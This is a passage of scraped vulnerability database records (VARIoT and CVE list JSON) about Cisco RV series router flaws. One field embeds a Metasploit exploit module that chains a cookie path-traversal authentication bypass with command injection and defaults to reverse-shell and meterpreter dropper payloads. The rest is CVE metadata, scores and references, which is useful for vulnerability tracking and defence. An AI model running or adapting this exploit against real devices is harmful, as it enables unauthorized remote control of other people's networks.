      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV series router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. \n          This access can then be used to pivot to other parts of the network. This module works on firmware\n          versions 1.0.03.24 and below. \n        },\n        'License' => MSF_LICENSE,\n        'Platform' => ['linux', 'unix'],\n        'Author' => [\n          'Biem Pham',  # Vulnerability Discoveries\n          'Neterum',    # Metasploit Module\n          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb\n        ],\n        'DisclosureDate' => '2021-11-02',\n        'Arch' => [ARCH_CMD, ARCH_ARMLE],\n        'References' => [\n          ['CVE', '2022-20705'], # Authentication Bypass\n          ['CVE', '2022-20707'], # Command Injection\n          ['ZDI', '22-410'], # Authentication Bypass\n          ['ZDI', '22-411']  # Command Injection\n        ],\n        'Targets' => [\n          [\n            'Unix Command',\n            {\n              'Platform' => 'unix',\n              'Arch' => ARCH_CMD,\n              'Type' => :unix_cmd,\n              'Payload' => {\n                'BadChars' => '\\'#'\n              },\n              'DefaultOptions' => {\n                'PAYLOAD' => 'cmd/unix/reverse_netcat'\n              }\n            }\n          ],\n          [\n            'Linux Dropper',\n            {\n              'Platform' => 'linux',\n              'Arch' => [ARCH_ARMLE],\n              'Type' => :linux_dropper,\n              'Payload' => {\n                'BadChars' => '\\'#'\n              },\n              'CmdStagerFlavor' => [ 'wget', 'curl' ],\n              'DefaultOptions' => {\n                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'\n              }\n            }\n          ]\n        ],\n        'DefaultTarget' => 0,\n        'DefaultOptions' => {\n          'RPORT' => 443,\n          'SSL' => true,\n          'MeterpreterTryToFork' => true\n        },\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'Base path', '/'])\n      ]\n    )\n  end\n\n  # sessionid utilized later needs to be set to length\n  # of 16 or exploit will fail. Tested with lengths\n  # 14-17\n  def generate_session_id\n    return Rex::Text.rand_text_alphanumeric(16)\n  end\n\n  def check\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => '/upload',\n      'headers' => {\n        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id\n      }\n    }, 10)\n\n    # A proper \"upload\" will trigger file creation. So the send_request_cgi call\n    # above is an incorrect \"upload\" call to avoid creating a file on disk. The router will return\n    # status code 405 Not Allowed if authentication has been bypassed by the above request. \n    # The firmware containing this authentication bypass also contains the command injection\n    # vulnerability that will be abused during actual exploitation. Non-vulnerable\n    # firmware versions will respond with 403 Forbidden. \n    if res.nil?\n      return CheckCode::Unknown('The device did not respond to request packet.')\n    elsif res.code == 405\n      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')\n    elsif res.code == 403\n      return CheckCode::Safe('The device is not vulnerable to exploitation.')\n    else # Catch-all\n      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')\n    end\n  end\n\n  def execute_command(cmd, _opts = {})\n    res = send_exploit(cmd)\n\n    # Successful unix_cmd shells should not produce a response. \n    # However if a response is returned, check the status code and return\n    # Failure::NotVulnerable if it is 403 Forbidden. \n    if target['Type'] == :unix_cmd && res&.code == 403\n      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')\n    end\n\n    if target['Type'] == :linux_dropper\n      fail_with(Failure::Unreachable, 'The target did not respond') unless res\n      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200\n      begin\n        body_json = res.get_json_document\n        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json\n      rescue JSON::ParserError => e\n        print_error(\"Failed: #{e.class} - #{e.message}\")\n        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')\n      end\n    end\n\n    print_good('Exploit successfully executed.')\n  end\n\n  def send_exploit(cmd)\n    filename = Rex::Text.rand_text_alphanumeric(5..12)\n    fileparam = Rex::Text.rand_text_alphanumeric(5..12)\n    input = Rex::Text.rand_text_alphanumeric(5..12)\n\n    # sessionid utilized later needs to be set to length\n    # of 16 or exploit will fail. Tested with lengths\n    # 14-17\n    sessionid = Rex::Text.rand_text_alphanumeric(16)\n\n    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. \n    pathparam = 'Configuration'\n\n    destination = \"'; \" + cmd + ' #'\n\n    multipart_form = Rex::MIME::Message.new\n    multipart_form.add_part(filepath, nil, nil, 'form-data; name=\"file.path\"')\n    multipart_form.add_part(filename, nil, nil, 'form-data; name=\"filename\"')\n    multipart_form.add_part(pathparam, nil, nil, 'form-data; name=\"pathparam\"')\n    multipart_form.add_part(fileparam, nil, nil, 'form-data; name=\"fileparam\"')\n    multipart_form.add_part(destination, nil, nil, 'form-data; name=\"destination\"')\n    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name=\"input\"; filename=\"%<filename>s\"', filename: filename))\n\n    # Escaping \"/tmp/upload/\" folder that does not contain any other permanent files\n    send_request_cgi({\n      'method' => 'POST',\n      'uri' => '/upload',\n      'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n      'headers' => {\n        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid\n      },\n      'data' => multipart_form.to_s\n    }, 10)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n    case target['Type']\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager(linemax: 120)\n    end\n  end\nend\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            db: "PACKETSTORM",
            id: "170988",
         },
      ],
      trust: 3.69,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20705",
            trust: 5.5,
         },
         {
            db: "ZDI",
            id: "ZDI-22-415",
            trust: 2.4,
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
            trust: 2.4,
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
            trust: 2.4,
         },
         {
            db: "PACKETSTORM",
            id: "170988",
            trust: 1.8,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
            trust: 0.8,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15848",
            trust: 0.7,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15882",
            trust: 0.7,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15610",
            trust: 0.7,
         },
         {
            db: "CS-HELP",
            id: "SB2022020301",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "PACKETSTORM",
            id: "170988",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   id: "VAR-202202-0325",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2024-02-13T01:29:02.464000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Cisco has issued an update to correct this vulnerability.",
            trust: 2.1,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "cisco-sa-smb-mult-vuln-KA9PK6D",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco Small Business Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=182405",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "https://github.com/20142995/Goby",
            trust: 0.1,
            url: "https://github.com/20142995/goby ",
         },
         {
            title: "Goby_POC\nPOC 数量1319",
            trust: 0.1,
            url: "https://github.com/z0fhack/goby_poc ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305 ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-rce ",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-787",
            trust: 1,
         },
         {
            problemtype: "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 3.8,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            trust: 2.3,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-415/",
         },
         {
            trust: 1.8,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-410/",
         },
         {
            trust: 1.8,
            url: "http://packetstormsecurity.com/files/170988/cisco-rv-series-authentication-bypass-command-injection.html",
         },
         {
            trust: 1.7,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-409/",
         },
         {
            trust: 1.5,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20705",
         },
         {
            trust: 0.6,
            url: "https://www.cybersecurity-help.cz/vdb/sb2022020301",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/787.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv340_lan/",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20707",
         },
         {
            trust: 0.1,
            url: "https://metasploit.com/download",
         },
         {
            trust: 0.1,
            url: "https://github.com/rapid7/metasploit-framework",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "PACKETSTORM",
            id: "170988",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            db: "PACKETSTORM",
            id: "170988",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
         {
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            date: "2022-02-10T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            date: "2023-04-12T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            date: "2023-02-14T15:32:53",
            db: "PACKETSTORM",
            id: "170988",
         },
         {
            date: "2022-02-03T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
         {
            date: "2022-02-10T18:15:09.307000",
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-415",
         },
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-410",
         },
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-409",
         },
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20705",
         },
         {
            date: "2023-04-12T07:15:00",
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
         {
            date: "2023-02-15T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
         {
            date: "2023-11-07T03:42:40.710000",
            db: "NVD",
            id: "CVE-2022-20705",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business RV  series router   Out-of-bounds write vulnerability in",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004459",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-166",
         },
      ],
      trust: 0.6,
   },
}

cve-2021-1309
Vulnerability from cvelistv5
Published
2021-04-08 04:05
Modified
2024-11-08 23:29
Summary
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T16:02:56.418Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2021-1309",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "no",
                           },
                           {
                              "Technical Impact": "partial",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-08T20:46:45.692659Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-08T23:29:40.340Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2021-04-07T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 7.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-119",
                     description: "CWE-119",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2021-04-08T04:05:30",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
            },
         ],
         source: {
            advisory: "cisco-sa-rv-multi-lldp-u7e4chCe",
            defect: [
               [
                  "CSCvw62392",
                  "CSCvw62395",
                  "CSCvw62410",
                  "CSCvw62411",
                  "CSCvw62413",
                  "CSCvw62416",
                  "CSCvw62417",
                  "CSCvw62418",
                  "CSCvw94339",
                  "CSCvw94341",
                  "CSCvw95016",
                  "CSCvw95017",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2021-04-07T16:00:00",
               ID: "CVE-2021-1309",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "8.8",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-119",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-rv-multi-lldp-u7e4chCe",
               defect: [
                  [
                     "CSCvw62392",
                     "CSCvw62395",
                     "CSCvw62410",
                     "CSCvw62411",
                     "CSCvw62413",
                     "CSCvw62416",
                     "CSCvw62417",
                     "CSCvw62418",
                     "CSCvw94339",
                     "CSCvw94341",
                     "CSCvw95016",
                     "CSCvw95017",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2021-1309",
      datePublished: "2021-04-08T04:05:30.866624Z",
      dateReserved: "2020-11-13T00:00:00",
      dateUpdated: "2024-11-08T23:29:40.340Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20706
Vulnerability from cvelistv5
Published
2022-02-10 17:06
Modified
2024-11-06 16:31
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:48.575Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-418/",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20706",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-06T16:03:01.010339Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-06T16:31:19.816Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-02-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-121",
                     description: "CWE-121",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-02-22T22:06:52",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-418/",
            },
         ],
         source: {
            advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
            defect: [
               [
                  "CSCvz88279",
                  "CSCvz94704",
                  "CSCwa12732",
                  "CSCwa12748",
                  "CSCwa12836",
                  "CSCwa13115",
                  "CSCwa13119",
                  "CSCwa13205",
                  "CSCwa13682",
                  "CSCwa13836",
                  "CSCwa13882",
                  "CSCwa13888",
                  "CSCwa13900",
                  "CSCwa14007",
                  "CSCwa14008",
                  "CSCwa14564",
                  "CSCwa14565",
                  "CSCwa14601",
                  "CSCwa14602",
                  "CSCwa15167",
                  "CSCwa15168",
                  "CSCwa18769",
                  "CSCwa18770",
                  "CSCwa32432",
                  "CSCwa36774",
                  "CSCwa54598",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-02-03T00:00:00",
               ID: "CVE-2022-20706",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
